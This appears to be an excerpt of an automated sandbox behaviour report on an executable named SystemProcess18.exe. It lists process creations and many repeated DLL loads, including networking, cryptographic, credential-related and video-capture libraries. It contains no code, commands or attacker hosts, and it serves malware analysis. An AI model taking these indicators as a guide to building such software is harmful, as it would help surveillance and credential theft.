Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
